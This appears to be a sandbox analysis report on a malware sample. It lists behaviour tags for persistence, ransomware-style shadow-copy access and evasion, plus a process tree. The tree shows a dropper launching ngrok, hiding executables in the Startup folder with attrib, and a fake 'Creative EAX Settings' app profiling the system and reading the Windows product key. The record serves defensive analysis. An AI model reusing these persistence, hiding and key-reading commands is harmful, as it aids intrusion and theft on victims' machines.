PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Net amp.exe

"C:\Users\Admin\AppData\Local\Temp\Net amp.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef66c9758,0x7fef66c9768,0x7fef66c9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1208 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2360 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1280 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1376 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3540 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3568 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3668 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3784 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3760 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x13f7f7688,0x13f7f7698,0x13f7f76a8

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe"

C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe

"C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3772 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2560 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2332 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2352 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=940 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2508 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3036 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=2072 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=2528 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2052 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=3632 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4352 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4356 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4164 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4188 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=4264 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4072 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4464 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4500 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4560 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Users\Admin\Downloads\Creative EAX Settings.exe

"C:\Users\Admin\Downloads\Creative EAX Settings.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe"

C:\Users\Admin\Downloads\Creative EAX Settings.exe

"C:\Users\Admin\Downloads\Creative EAX Settings.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=4152 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=3956 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1044 --field-trial-handle=1176,6260504415997139111,14957227635753991944,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=NaN get ExecutablePath

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1584 --field-trial-handle=1176,6260504415997139111,14957227635753991944,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1596 --field-trial-handle=1176,6260504415997139111,14957227635753991944,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=3572 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=3016 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=4420 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=4892 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=5000 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5152 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=5400 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5328 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=5528 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=6112 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=6004 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=5644 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=5904 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=6040 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=5776 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

